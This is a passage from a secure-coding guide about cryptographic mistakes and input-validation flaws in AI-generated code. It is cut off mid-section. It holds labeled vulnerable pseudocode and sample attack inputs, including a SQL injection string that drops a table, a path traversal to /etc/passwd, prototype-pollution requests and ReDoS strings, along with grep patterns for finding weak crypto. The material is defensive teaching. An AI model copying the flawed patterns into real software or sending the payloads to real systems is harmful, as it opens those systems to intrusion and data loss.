    iv = encrypted[:16]
    mac = encrypted[-32:]
    ciphertext = encrypted[16:-32]

    // Verify MAC FIRST, before any decryption
    expectedMac = HMAC_SHA256(macKey, iv + ciphertext)
    if not constantTimeEquals(mac, expectedMac):
        throw IntegrityError("Data has been tampered with")

    return AES_CBC_decrypt(encKey, iv, ciphertext)

// BETTER: Just use GCM which includes authentication
function encryptDataBest(data, key):
    nonce = generateSecureRandom(12)
    ciphertext, tag = AES_GCM_encrypt(key, nonce, data)
    return nonce + ciphertext + tag

Solution:

Always use authenticated encryption (GCM, ChaCha20-Poly1305).
If you must use CBC, add an HMAC in the encrypt-then-MAC pattern.
Verify the authentication tag before decrypting.

Common Mistake 2: Confusing Encoding with Encryption

// COMMON MISTAKE: Base64 as "encryption"
function "encrypt"Data(sensitiveData):
    return base64Encode(sensitiveData)  // NOT ENCRYPTION!

function "decrypt"Data(encodedData):
    return base64Decode(encodedData)

// COMMON MISTAKE: XOR with short key as encryption
function "encrypt"WithXor(data, password):
    key = password.repeat(ceil(length(data) / length(password)))
    return xor(data, key)  // Trivially broken with frequency analysis

// COMMON MISTAKE: ROT13 or character substitution
function "encrypt"Text(text):
    return rot13(text)  // No security at all

// COMMON MISTAKE: Obfuscation ≠ encryption
function storeApiKey(apiKey):
    obfuscated = ""
    for char in apiKey:
        obfuscated += chr(ord(char) + 5)  // Just shifted characters
    return obfuscated

// COMMON MISTAKE: Custom "encryption" algorithm
function myEncrypt(data, key):
    result = ""
    for i, char in enumerate(data):
        newChar = chr((ord(char) + ord(key[i % len(key)]) * 7) % 256)
        result += newChar
    return result  // Easily broken - don't invent crypto!

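Reality check:

Method	Security Level	Use Case
Base64	0 (none)	Binary-to-text encoding only
ROT13	0 (none)	Jokes, hiding spoilers
XOR with repeating key	Trivially broken	Never use
Homegrown "encryption"	Unknown, likely broken	Never use
AES-GCM with random key	Strong	Actual encryption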

Solution:

Use standard algorithms: AES-GCM, ChaCha20-Poly1305.
Never invent your own encryption algorithm.
Encoding (Base64, hex) is for representation, not security.
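To make the point concrete, the sketch below reverses both "protections" without being given any secret. The sample record and the key `hunter2` are made-up values, and the attack shown on repeating-key XOR is a simple known-plaintext guess rather than the frequency analysis mentioned above.

```python
import base64
from itertools import cycle


def xor_with_repeating_key(data: bytes, key: bytes) -> bytes:
    """The broken 'cipher' from the examples above."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


secret = b'{"role": "user", "api_key": "sk_live_example"}'

# Base64 is reversible by anyone: there is no key involved at all.
encoded = base64.b64encode(secret)
decoded = base64.b64decode(encoded)

# Repeating-key XOR falls to a known-plaintext guess.
key = b"hunter2"
ciphertext = xor_with_repeating_key(secret, key)
known_prefix = b'{"role"'  # attacker guesses how the JSON starts (7 bytes)
recovered_key = xor_with_repeating_key(ciphertext[: len(known_prefix)], known_prefix)
decrypted = xor_with_repeating_key(ciphertext, recovered_key)
```

Seven guessed bytes recover the full seven-byte key, after which the entire message decrypts.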

Common Mistake 3: Improper Key Storage After Generation

// COMMON MISTAKE: Logging the key
function generateAndStoreKey():
    key = generateSecureRandom(32)
    log.info("Generated new encryption key: " + hexEncode(key))  // LOGGED!
    return key

// COMMON MISTAKE: Key in config file committed to git
// config.json:
{
    "database_url": "...",
    "encryption_key": "a1b2c3d4e5f6..."  // Will be in git history forever
}

// COMMON MISTAKE: Key in environment variable readable from the process list
// Launching: ENCRYPTION_KEY=secret123 ./myapp
// `ps auxe` or /proc/<pid>/environ exposes ENCRYPTION_KEY=secret123
// to the same user and to root (plain `ps aux` shows arguments only)

// COMMON MISTAKE: Key stored in database alongside encrypted data
function storeEncryptedData(userId, sensitiveData):
    key = generateSecureRandom(32)
    encrypted = AES_GCM_encrypt(key, generateNonce(), sensitiveData)
    database.insert("user_data", {
        user_id: userId,
        encrypted_data: encrypted,
        encryption_key: key  // KEY NEXT TO DATA = pointless encryption
    })

// COMMON MISTAKE: Key derivation material stored insecurely
function setupEncryption(password):
    salt = generateSecureRandom(16)
    key = deriveKey(password, salt)

    // Storing in easily accessible location
    localStorage.setItem("encryption_salt", salt)
    localStorage.setItem("derived_key", key)  // KEY IN BROWSER STORAGE!

Secure key storage patterns:

// SECURE: Using a key management service (KMS)
function storeKeySecurely(keyId, keyMaterial):
    // AWS KMS, Azure Key Vault, GCP KMS, HashiCorp Vault
    kms.storeKey(keyId, keyMaterial, {
        rotation_period: "90 days",
        deletion_protection: true,
        access_policy: restrictedPolicy
    })

// SECURE: Key wrapped with hardware security module (HSM)
function wrapKeyForStorage(dataKey):
    wrappingKey = hsm.getWrappingKey()  // Never leaves HSM
    wrappedKey = hsm.wrapKey(dataKey, wrappingKey)
    return wrappedKey  // Safe to store - can only unwrap with HSM

// SECURE: Envelope encryption pattern
function envelopeEncrypt(data):
    // Generate data encryption key (DEK)
    dek = generateSecureRandom(32)

    // Encrypt data with DEK
    encryptedData = AES_GCM_encrypt(dek, generateNonce(), data)

    // Encrypt DEK with key encryption key (KEK) from KMS
    encryptedDek = kms.encrypt(dek)

    // Store encrypted DEK with encrypted data
    return {
        encrypted_data: encryptedData,
        encrypted_key: encryptedDek,  // DEK is encrypted, safe to store
        kms_key_id: kms.getCurrentKeyId()
    }

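Algorithm Selection Guide

Symmetric Encryption

Algorithm	Key Size	Use Case	Notes
AES-256-GCM	256-bit	General purpose	Recommended default, 96-bit nonce
ChaCha20-Poly1305	256-bit	Performance-critical, mobile	Faster without AES-NI hardware
XChaCha20-Poly1305	256-bit	High-volume encryption	192-bit nonce, safe for random generation
AES-256-GCM-SIV	256-bit	Nonce-misuse resistance	Slightly slower, safer under accidental nonce reuse

Avoid: DES, 3DES, RC4, Blowfish, AES-ECB, AES-CBC without HMAC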

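Password Hashing

Algorithm	Memory	Use Case	Notes
Argon2id	64+ MB	New applications	Best protection, memory-hard
bcrypt	N/A	Legacy compatibility	Widely supported, cost 12+
scrypt	64+ MB	When Argon2 is unavailable	Good alternative

Avoid: MD5, SHA1, SHA256 (single round), PBKDF2 with fewer than 600,000 iterations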

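Key Derivation

Algorithm	Use Case	Notes
Argon2id	Password-based	Best for password → key
HKDF	Key expansion	Derive multiple keys from a single key
PBKDF2-SHA256	Compatibility	Requires 600,000+ iterations

Avoid: MD5-based KDFs, single-hash derivation, low iteration counts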

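Message Authentication

Algorithm	Output	Use Case	Notes
HMAC-SHA256	256-bit	General purpose	Standard choice
HMAC-SHA512	512-bit	Extra security margin	Faster on 64-bit systems
Poly1305	128-bit	With ChaCha20	Part of the AEAD construction

Avoid: MD5, SHA1, plain hashes without the HMAC construction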

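Digital Signatures

Algorithm	Use Case	Notes
Ed25519	General purpose	Fast, secure, simple API
ECDSA P-256	Compatibility	Widely supported
RSA-PSS	Legacy systems	Requires keys of 2048 bits or more

Avoid: RSA PKCS#1 v1.5, DSA, ECDSA with weak curves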

Detection Tips: How to Spot Cryptographic Issues

Code Review Patterns

// RED FLAGS in cryptographic code:

// 1. Weak hash functions
md5(               // Search for: md5\s*\(
sha1(              // Search for: sha1\s*\(
SHA1.Create()      // Search for: SHA1

// 2. ECB mode
mode = "ECB"       // Search for: ECB
AES/ECB/           // Search for: /ECB/
mode_ECB           // Search for: ECB

// 3. Static or weak IVs
iv = [0, 0, 0, ...   // Search for: iv\s*=\s*\[0
IV = "0000           // Search for: IV\s*=\s*["']0
static IV            // Search for: static.*[Ii][Vv]

// 4. Math.random for security
Math.random()        // Search for: Math\.random
random.randint(      // Search for: randint\( (context matters)

// 5. Weak secrets
= "secret"           // Search for: =\s*["']secret
SECRET = "           // Search for: SECRET\s*=\s*["']
= "password"         // Search for: =\s*["']password

// 6. Direct password use as key
key = password       // Search for: key\s*=\s*password
AES(password)        // Search for: AES\s*\(\s*password

// 7. Low iteration counts
// (\D* rather than .* so that values such as 600000 are not flagged)
iterations: 1000     // Search for: iterations\D*\d{1,4}(\D|$)
rounds = 100         // Search for: rounds\s*=\s*\d{1,3}(\D|$)

// GREP patterns for security review:
// [Mm][Dd]5\s*\(
// [Ss][Hh][Aa]1\s*\(
// ECB
// [Ii][Vv]\s*=\s*\[0
// Math\.random
// iterations[^0-9]*[0-9]{1,4}([^0-9]|$)
// (password|secret)\s*=\s*["']
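The patterns above can be wired into a small line-based scanner. The sketch below is a starting point under stated assumptions, not a replacement for a real static analyzer: the rule names are hypothetical, the regexes are adapted from the list above, and the iteration rule uses `\D*` with a lookahead so that `600000` and `600_000` are not reported.

```python
import re

# Hypothetical rule names mapped to patterns adapted from the list above.
RED_FLAGS = {
    "weak-hash": re.compile(r"\b(md5|sha1)\s*\(", re.IGNORECASE),
    "ecb-mode": re.compile(r"ECB"),
    "zero-iv": re.compile(r"\biv\s*=\s*\[0", re.IGNORECASE),
    "insecure-random": re.compile(r"Math\.random"),
    "low-iterations": re.compile(r"iterations\D*\d{1,4}(?![\d_])"),
    "hardcoded-secret": re.compile(r"(password|secret)\s*=\s*[\"']", re.IGNORECASE),
}


def scan_source(text: str) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) for every red flag found."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RED_FLAGS.items():
            if pattern.search(line):
                findings.append((lineno, rule))
    return findings
```

Matches are hints for a reviewer rather than verdicts: a hit on `ECB` inside a comment, or `md5(` used for a cache key, still needs a human decision.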

Security Testing Checklist

// Cryptographic security test cases:

// 1. Algorithm verification
- [ ] No MD5 or SHA1 for password hashing
- [ ] No ECB mode encryption
- [ ] AES key size is 256 bits (not 128)
- [ ] Authenticated encryption used (GCM, ChaCha20-Poly1305)

// 2. Randomness verification
- [ ] IVs/nonces are cryptographically random
- [ ] Session tokens use CSPRNG
- [ ] No predictable seeds for random generation

// 3. Key management
- [ ] Keys not hardcoded in source
- [ ] Keys not logged or exposed in errors
- [ ] Key derivation uses appropriate KDF
- [ ] Key rotation mechanism exists

// 4. Password hashing
- [ ] bcrypt cost ≥ 12 or Argon2 with appropriate params
- [ ] Unique salt per password
- [ ] Timing-safe comparison used

// 5. Implementation details
- [ ] Constant-time comparison for secrets
- [ ] No padding oracle vulnerabilities
- [ ] HMAC used (not hash(key+message))
- [ ] Authenticated encryption or encrypt-then-MAC

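Security Checklist

Password hashing uses Argon2id, bcrypt (cost 12+), or scrypt.
Every password has a unique random salt (handled automatically by bcrypt/Argon2).
MD5, SHA1, and single-round SHA256 are not used for security-sensitive hashing.
Encryption uses an authenticated mode (AES-GCM, ChaCha20-Poly1305).
No ECB mode encryption.
IVs/nonces are generated with a cryptographically secure random number generator.
Every encryption operation uses a unique IV/nonce.
GCM nonces are tracked to prevent reuse (or SIV mode is used).
All security-relevant random values come from a CSPRNG (crypto.randomBytes, the secrets module).
Math.random() and similar PRNGs are not used for security purposes.
Encryption keys are 256 bits and properly random.
No hardcoded keys in source code.
Keys are derived with HKDF, PBKDF2 (600k+ iterations), or Argon2.
Separate keys are derived for different cryptographic operations.
A key rotation mechanism is implemented.
Keys are stored in a KMS or HSM, or encrypted at rest.
All secret comparisons use a timing-safe comparison.
HMAC is used instead of hash(key + message).
Error messages do not reveal cryptographic details (padding validity, etc.).
No custom cryptographic algorithms; only vetted standard primitives.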

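Pattern 6: Input Validation and Data Sanitization

CWE References: CWE-20 (Improper Input Validation), CWE-1286 (Improper Validation of Syntactic Correctness of Input), CWE-185 (Incorrect Regular Expression), CWE-1333 (Inefficient Regular Expression Complexity), CWE-129 (Improper Validation of Array Index)

Priority Score: 21 (Frequency: 9, Severity: 7, Detectability: 5)

Introduction: The Foundation AI Often Overlooks

Input validation is the first line of defense against nearly all injection attacks, data corruption, and application crashes. Yet AI-generated code often fails to implement proper validation, either treating it as an afterthought or omitting it entirely.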

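Why AI models skip or fail at input validation:

Training data focuses on the "happy path": Most tutorial code, documentation examples, and Stack Overflow answers demonstrate functionality with expected input. Validation code is often omitted for brevity, which teaches the AI that validation is optional.
Validation is context-dependent: Proper validation depends on business rules, data types, and downstream use, which is context the AI often lacks. The model cannot know that a "name" field should not exceed 100 characters or that "age" must be between 0 and 150.
Client-side validation looks complete: AI training data often contains client-side form validation (JavaScript). The model learns these patterns but fails to understand that server-side validation is the real security boundary.
Regex complexity: Complex regular expressions generated by AI may be vulnerable to catastrophic backtracking (ReDoS) or may miss edge cases. The model optimizes for matching expected patterns rather than rejecting malicious ones.
Trust boundary confusion: AI has no inherent understanding of which data sources are trusted. It may validate user form input yet trust data from internal APIs, databases, or message queues, any of which may also be compromised.
Type system overconfidence: In typed languages, AI may assume that type declarations are sufficient validation, overlooking the need for range checks, format validation, and semantic constraints.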

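Why this matters (the foundation of all injection attacks):

Every major vulnerability class traces back to insufficient input validation:

SQL injection: unvalidated input in queries
Command injection: unvalidated input in shell commands
XSS: unvalidated input rendered in HTML
Path traversal: unvalidated file paths
Deserialization attacks: unvalidated serialized objects
Buffer overflow: unvalidated input length
Business logic bypass: unvalidated business constraints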

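Impact statistics:

CWE-20 (Improper Input Validation) is cited as a root cause of multiple categories in the OWASP Top 10.
42% of SQL injection vulnerabilities trace back to missing input validation (NIST NVD analysis).
ReDoS vulnerabilities in npm packages grew 143% year over year (Snyk 2024).
67% of AI-generated validation code validates only on the client side (2025 security research).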

Bad Examples: Different Manifestations

Bad Example 1: Client-Side-Only Validation

// VULNERABLE: All validation in frontend, server trusts everything

// Frontend validation (JavaScript)
function validateForm(form):
    if form.email is empty:
        showError("Email required")
        return false

    if not isValidEmail(form.email):
        showError("Invalid email format")
        return false

    if form.password.length < 8:
        showError("Password must be 8+ characters")
        return false

    if form.age < 0 or form.age > 150:
        showError("Invalid age")
        return false

    // Form is "valid", submit to server
    return true

// Backend endpoint (VULNERABLE - no validation)
function handleRegistration(request):
    // AI assumes frontend validated, so just use the data
    email = request.body.email      // Could be anything
    password = request.body.password // Could be empty
    age = request.body.age          // Could be -1 or 9999999

    // Directly store in database
    query = "INSERT INTO users (email, password, age) VALUES (?, ?, ?)"
    database.execute(query, [email, hashPassword(password), age])

    return {"success": true}

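Why this is dangerous:

Attackers bypass the JavaScript by sending direct HTTP requests (curl, Postman, scripts).
Browser developer tools allow form data to be modified before submission.
The server accepts arbitrary data with no protection.
Data integrity problems spread throughout the application.
SQL injection remains possible if query construction is vulnerable elsewhere.

Attack scenario: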

// Attacker sends directly to API:
POST /api/register
Content-Type: application/json

{
    "email": "'; DROP TABLE users; --",
    "password": "",
    "age": -9999999999
}

Bad Example 2: Partial Validation (Type Checked, Range Unchecked)

// VULNERABLE: Validates type exists, ignores business constraints

function processPayment(request):
    // Type checking only
    if typeof(request.amount) != "number":
        return error("Amount must be a number")

    if typeof(request.quantity) != "integer":
        return error("Quantity must be an integer")

    // MISSING: Range validation
    // amount could be negative (refund attack)
    // quantity could be 0 or MAX_INT (business logic bypass)

    total = request.amount * request.quantity
    chargeCustomer(request.customerId, total)

    return {"charged": total}

// Attacker exploits:
{
    "amount": -100.00,      // Negative = credit instead of charge
    "quantity": 999999999,  // Integer overflow potential
    "customerId": "12345"
}

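Why this is dangerous:

Type validation is necessary but not sufficient.
Business logic depends on sensible ranges.
Integer overflow can wrap around to unexpected values.
Negative values can reverse the intended behavior
Zero values can cause failed payments or division errors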
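
A minimal Python sketch of the missing range checks follows. The limits (MAX_AMOUNT, MAX_QUANTITY) and the function name validate_payment are assumptions chosen for illustration; real limits come from the business rules of the application.

```python
from decimal import Decimal, InvalidOperation

MAX_AMOUNT = Decimal("10000.00")  # assumed per-item ceiling
MAX_QUANTITY = 100                # assumed per-order ceiling


def validate_payment(amount, quantity):
    """Return (total, None) on success or (None, error message) on failure."""
    # bool is a subclass of int in Python, so reject it explicitly.
    if isinstance(quantity, bool) or not isinstance(quantity, int):
        return None, "quantity must be an integer"
    if not 1 <= quantity <= MAX_QUANTITY:
        return None, "quantity out of range"

    try:
        # Going through str() avoids binary floating-point artifacts.
        amount = Decimal(str(amount))
    except InvalidOperation:
        return None, "amount must be a number"
    # is_finite() rejects NaN and Infinity before any ordering comparison.
    if not amount.is_finite() or not Decimal("0.01") <= amount <= MAX_AMOUNT:
        return None, "amount out of range"

    return amount * quantity, None
```

With these checks, the negative amount and the oversized quantity from the exploit payload are both rejected before any charge is computed.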

Bad Example 3: Regex Without Anchors

// VULNERABLE: Regex matches substring, not entire input

// Email validation without anchors
EMAIL_PATTERN = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"

function validateEmail(email):
    if regex.match(EMAIL_PATTERN, email):
        return true
    return false

// This PASSES validation:
validateEmail("MALICIOUS_PAYLOAD user@example.com MALICIOUS_PAYLOAD")
// Because "user@example.com" matches somewhere in the string

// Filename validation without anchors
SAFE_FILENAME = "[a-zA-Z0-9_-]+"

function validateFilename(filename):
    if regex.match(SAFE_FILENAME, filename):
        return true
    return false

// This PASSES validation:
validateFilename("../../../etc/passwd")
// Because "etc" matches the pattern somewhere in the string

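Why this is dangerous:

The regex matches anywhere in the string rather than the entire input.
Injection payloads can surround or precede the valid pattern
Path traversal bypasses the filename validation
An email field can contain an XSS payload wrapped around a valid address.
Common in AI-generated code that copies regex patterns without anchors.

Fix preview: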

// SECURE: Use ^ and $ anchors to match entire input
EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$"
SAFE_FILENAME = "^[a-zA-Z0-9_-]+$"
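
As a concrete illustration, the Python sketch below contrasts substring matching with whole-string matching using the standard re module. The helper names are hypothetical. It uses fullmatch instead of explicit ^ and $ anchors, partly because in Python a trailing $ also matches just before a final newline.

```python
import re

EMAIL_RE = re.compile(r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}")
FILENAME_RE = re.compile(r"[a-zA-Z0-9_-]+")


def is_email_unanchored(value: str) -> bool:
    # VULNERABLE: search() succeeds if the pattern occurs anywhere in value.
    return EMAIL_RE.search(value) is not None


def is_email(value: str) -> bool:
    # fullmatch() succeeds only if the whole string matches the pattern.
    return EMAIL_RE.fullmatch(value) is not None


def is_filename_unanchored(value: str) -> bool:
    # VULNERABLE: "etc" inside "../../../etc/passwd" is enough to pass.
    return FILENAME_RE.search(value) is not None


def is_filename(value: str) -> bool:
    return FILENAME_RE.fullmatch(value) is not None
```

The unanchored helpers accept a payload wrapped around a valid address and a traversal path, while the fullmatch versions reject both.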

Bad Example 4: ReDoS-Vulnerable Patterns

// VULNERABLE: Catastrophic backtracking regex patterns

// Email validation with ReDoS vulnerability
// Pattern: nested quantifiers with overlapping character classes
VULNERABLE_EMAIL = "^([a-zA-Z0-9]+)*@[a-zA-Z0-9]+\.[a-zA-Z]+$"

// Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
// The regex engine backtracks exponentially trying all combinations

// URL validation with ReDoS
VULNERABLE_URL = "^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$"

// Attack input: long string of valid URL characters followed by invalid character
// "http://example.com/" + "a" * 30 + "!"

// Naive duplicate word finder (common tutorial example)
DUPLICATE_WORDS = "\b(\w+)\s+\1\b"
// Can hang on: "word word word word word word word word word word!"

function validateInput(input, pattern):
    // This can hang for minutes or crash the server
    return regex.match(pattern, input)

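Why this is dangerous:

A single malicious request can consume 100% of a CPU core for minutes.
Denial of service does not require a flood of requests
AI copies these patterns from tutorials without understanding their complexity.
Nested quantifiers such as (a+)+, (a*)*, and (a?)* are red flags.
Overlapping character classes make the problem worse.

ReDoS complexity analysis: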

// Pattern: (a+)+$
// Input: "aaaaaaaaaaaaaaaaaaaaaaaaX"
//
// For 25 'a's followed by 'X':
// - The engine tries every possible way to split the 'a's between groups
// - Time complexity: O(2^n) where n is input length
// - 25 chars = 33 million+ combinations to try
// - 30 chars = 1 billion+ combinations
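
The growth can be reproduced with a simplified model rather than a real regex engine. The Python sketch below assumes a naive backtracking matcher and counts how many times it reaches the failing end-of-input check for (a+)+$ on n 'a' characters followed by 'X'. The function name is hypothetical, and production engines apply optimizations that this model ignores.

```python
from functools import lru_cache


@lru_cache(maxsize=None)
def failed_end_checks(n: int) -> int:
    """Count failing '$' checks in a naive backtracking model of (a+)+$.

    n is the number of 'a' characters still unconsumed before the final 'X'.
    """
    total = 0
    # The next (a+) group may take 1..n of the remaining characters.
    for group_size in range(1, n + 1):
        total += 1                                   # try '$' here: it fails
        total += failed_end_checks(n - group_size)   # or start another group
    return total
```

The count works out to 2^n - 1, so each extra character roughly doubles the work. Memoization is used only to make the counting itself fast; the modeled engine has no such shortcut.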

Bad Example 5: Missing Null/Undefined Checks

// VULNERABLE: Assumes data structure completeness

function processUserProfile(user):
    // No null checks - any missing field crashes
    fullName = user.firstName + " " + user.lastName  // Crash if null

    emailDomain = user.email.split("@")[1]  // Crash if email is null

    age = parseInt(user.profile.age)  // Crash if profile is null

    // Process address (deeply nested)
    city = user.profile.address.city.toUpperCase()  // Multiple crash points

    return {
        "name": fullName,
        "domain": emailDomain,
        "age": age,
        "city": city
    }

// API returns partial data:
{
    "firstName": "John",
    "lastName": null,           // Could be null
    "email": null,              // Could be missing
    "profile": {
        "age": "25"
        // address is missing entirely
    }
}

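Why this is dangerous:

Application crashes expose error information to attackers.
Null pointer exceptions may leak stack traces.
Partial data from APIs, databases, or user input is common
AI assumes the data structures seen in training are always complete.
A single null field triggers cascading failures.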
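
One way to tolerate partial data is to walk nested structures defensively. The Python sketch below assumes the profile arrives as plain dictionaries; get_path and summarize_profile are hypothetical helper names, not part of any library.

```python
from typing import Any, Optional


def get_path(data: Any, *keys: str) -> Optional[Any]:
    """Follow keys through nested dicts; return None if any level is missing."""
    current = data
    for key in keys:
        if not isinstance(current, dict):
            return None
        current = current.get(key)
    return current


def summarize_profile(user: dict) -> dict:
    first = get_path(user, "firstName") or ""
    last = get_path(user, "lastName") or ""
    email = get_path(user, "email")
    city = get_path(user, "profile", "address", "city")

    has_domain = isinstance(email, str) and "@" in email
    return {
        "name": f"{first} {last}".strip(),
        "domain": email.split("@", 1)[1] if has_domain else None,
        "city": city.upper() if isinstance(city, str) else None,
    }
```

Applied to the partial API response shown above, this returns a name of "John" with the domain and city set to None instead of raising.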

Bad Example 6: Trusting User-Supplied Array Indices

// VULNERABLE: Using user input directly as array index

function getItemByIndex(request):
    items = ["item0", "item1", "item2", "item3", "item4"]
    index = request.params.index  // User-provided

    // No validation - trusts user to provide valid index
    return items[index]  // Out of bounds or negative index

// Worse: Array index used for data access
function getUserData(request):
    userIndex = parseInt(request.params.id)

    // Could access negative index, other users' data, or crash
    return allUsersData[userIndex]

// Object property access from user input
function getConfigValue(request):
    configKey = request.params.key

    // Prototype pollution or access to __proto__, constructor
    return config[configKey]

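Why this is dangerous:

In some languages, negative indices wrap around to the end of the array.
Out-of-bounds access can crash the program or return undefined values
Integer overflow can produce unexpected indices.
User-controlled property access can enable prototype pollution
The __proto__, constructor, and prototype keys can modify object behavior

Attack scenario: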

// Array out of bounds:
GET /items?index=99999999
GET /items?index=-1

// Prototype pollution via property access:
GET /config?key=__proto__
GET /config?key=constructor
POST /config {"key": "__proto__", "value": {"isAdmin": true}}
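
A hedged Python sketch of the corresponding defenses follows: bounds-check the index and look keys up against an explicit allowlist. ITEMS, CONFIG, and the function names are illustrative assumptions. Python dictionaries have no prototype chain, so the key allowlist here demonstrates the general idea rather than a JavaScript-specific fix.

```python
ITEMS = ["item0", "item1", "item2", "item3", "item4"]
CONFIG = {"theme": "dark", "pageSize": "20"}
ALLOWED_CONFIG_KEYS = frozenset(CONFIG)


def get_item(raw_index: str) -> str:
    # isdigit() alone accepts some non-ASCII digits, so require ASCII as well.
    # The length cap keeps absurdly long digit strings out of int().
    if not (raw_index.isascii() and raw_index.isdigit()) or len(raw_index) > 9:
        raise ValueError("index must be a non-negative integer")
    index = int(raw_index)
    if index >= len(ITEMS):
        raise ValueError("index out of range")
    return ITEMS[index]


def get_config_value(key: str) -> str:
    # Only keys known in advance are readable; everything else is rejected.
    if key not in ALLOWED_CONFIG_KEYS:
        raise KeyError("unknown config key")
    return CONFIG[key]
```

Note that Python would otherwise accept "-1" as a valid list index and silently return the last element, which is why the sign is rejected before conversion.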

Good Examples: Correct Patterns

Good Example 1: Server-Side Validation Pattern

// SECURE: Comprehensive server-side validation with clear error messages

function handleRegistration(request):
    errors = []

    // Email validation
    email = request.body.email
    if email is null or email is empty:
        errors.append({"field": "email", "message": "Email is required"})
    else if length(email) > 254:  // RFC 5321 limit
        errors.append({"field": "email", "message": "Email too long"})
    else if not isValidEmailFormat(email):
        errors.append({"field": "email", "message": "Invalid email format"})
    else if not isAllowedEmailDomain(email):  // Business rule
        errors.append({"field": "email", "message": "Email domain not allowed"})

    // Password validation
    password = request.body.password
    if password is null or password is empty:
        errors.append({"field": "password", "message": "Password is required"})
    else if length(password) < 12:
        errors.append({"field": "password", "message": "Password must be 12+ characters"})
    else if length(password) > 128:  // Prevent DoS via bcrypt
        errors.append({"field": "password", "message": "Password too long"})
    else if not meetsComplexityRequirements(password):
        errors.append({"field": "password", "message": "Password too weak"})

    // Age validation (integer with business range)
    age = request.body.age
    if age is null:
        errors.append({"field": "age", "message": "Age is required"})
    else if typeof(age) != "integer":
        errors.append({"field": "age", "message": "Age must be a whole number"})
    else if age < 13:  // Business rule: minimum age
        errors.append({"field": "age", "message": "Must be at least 13 years old"})
    else if age > 150:  // Sanity check
        errors.append({"field": "age", "message": "Invalid age"})

    // Return all errors at once (better UX than one at a time)
    if errors.length > 0:
        return {"success": false, "errors": errors}

    // Only process after validation passes
    hashedPassword = hashPassword(password)
    createUser(email, hashedPassword, age)
    return {"success": true}

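Why this is secure:

Every field is validated before use.
Type, format, length, and business rules are all checked
Clear, specific error messages that aid debugging
All errors are collected and returned together (better UX)
Reasonable upper bounds prevent denial-of-service attacks.
Validation runs on the server, where the client cannot bypass it.

Good Example 2: Schema Validation Approach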

// SECURE: Declarative schema validation with robust library

// Define schema once, reuse everywhere
USER_REGISTRATION_SCHEMA = {
    "type": "object",
    "required": ["email", "password", "age", "name"],
    "additionalProperties": false,  // Reject unknown fields
    "properties": {
        "email": {
            "type": "string",
            "format": "email",
            "maxLength": 254
        },
        "password": {
            "type": "string",
            "minLength": 12,
            "maxLength": 128
        },
        "age": {
            "type": "integer",
            "minimum": 13,
            "maximum": 150
        },
        "name": {
            "type": "object",
            "required": ["first", "last"],
            "properties": {
                "first": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 100,
                    "pattern": "^[\\p{L}\\s'-]+$"  // Unicode letters, spaces, hyphens, apostrophes
                },
                "last": {
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 100,
                    "pattern": "^[\\p{L}\\s'-]+$"
                }
            }
        }
    }
}

function handleRegistration(request):
    // Validate entire payload against schema
    validationResult = schemaValidator.validate(request.body, USER_REGISTRATION_SCHEMA)

    if not validationResult.valid:
        return {
            "success": false,
            "errors": validationResult.errors  // Detailed error per field
        }

    // Data is guaranteed to match schema structure and constraints
    processRegistration(request.body)
    return {"success": true}

// Additional business logic validation after schema validation
function processRegistration(data):
    // Schema ensures structure; now check business rules
    if isEmailAlreadyRegistered(data.email):
        throw ValidationError("Email already registered")

    if isCommonPassword(data.password):
        throw ValidationError("Password is too common")

    createUser(data)

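Why this is secure:

The schema is declarative and easy to audit
additionalProperties: false prevents injection of unexpected data
The library handles type coercion consistently.
Unicode-aware pattern for international names
Built-in validation of nested objects
Structural validation is separated from business rules

Good Example 3: Safe Regex Patterns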

// SECURE: Anchored, bounded, and ReDoS-resistant patterns

// Email validation - anchored and bounded
// Note: Perfect email validation is complex; often better to just check format
// and verify via confirmation email
EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]{1,64}@[a-zA-Z0-9.-]{1,253}\\.[a-zA-Z]{2,63}$"

// Safe filename - anchored, limited character set, bounded length
FILENAME_PATTERN = "^[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}$"

// Safe identifier (alphanumeric + underscore, starts with letter)
IDENTIFIER_PATTERN = "^[a-zA-Z][a-zA-Z0-9_]{0,63}$"

// URL path segment - no special characters
PATH_SEGMENT_PATTERN = "^[a-zA-Z0-9._-]{1,255}$"

function validateWithSafeRegex(input, pattern, maxLength):
    // Length check BEFORE regex (prevents ReDoS)
    if input is null or length(input) > maxLength:
        return false

    // Use timeout-protected regex matching if available
    try:
        return regexMatchWithTimeout(pattern, input, timeout = 100ms)
    catch TimeoutException:
        logWarning("Regex timeout on input: " + truncate(input, 50))
        return false

// For complex patterns, use atomic groups or possessive quantifiers
// (syntax varies by regex engine)

// VULNERABLE: (a+)+
// SAFE: (?>a+)+ (atomic group - no backtracking into group)
// SAFE: a++ (possessive quantifier - never backtracks)

// Alternative: Linear-time regex engines (RE2, rust regex)
// These reject patterns that could have exponential complexity
function validateWithLinearRegex(input, pattern):
    // RE2 guarantees O(n) matching time
    return RE2.match(pattern, input)

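Why this is secure:

All patterns are anchored with ^ and $
Lengths are bounded to prevent long-input attacks
No overlapping character classes (no [a-zA-Z0-9]+ adjacent to [a-z]+).
No nested quantifiers that can cause catastrophic backtracking
Timeout protection as defense in depth
Option to use a linear-time regex engine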
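
In Python the same idea might look like the sketch below. The standard re module offers no timeout option, so this version relies on the length cap and on bounded, non-nested quantifiers; matches_bounded is a hypothetical helper name.

```python
import re
from typing import Any, Pattern

# Bounded quantifiers and no nested groups; fullmatch() supplies the anchoring.
IDENTIFIER_RE = re.compile(r"[a-zA-Z][a-zA-Z0-9_]{0,63}")
FILENAME_RE = re.compile(r"[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}")


def matches_bounded(value: Any, pattern: Pattern[str], max_length: int) -> bool:
    """Cheap type and length checks run before the regex ever sees the input."""
    if not isinstance(value, str) or len(value) > max_length:
        return False
    return pattern.fullmatch(value) is not None
```

Rejecting oversized input first means the regex only ever processes strings of a known, small size.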

Good Example 4: Type Coercion Handling

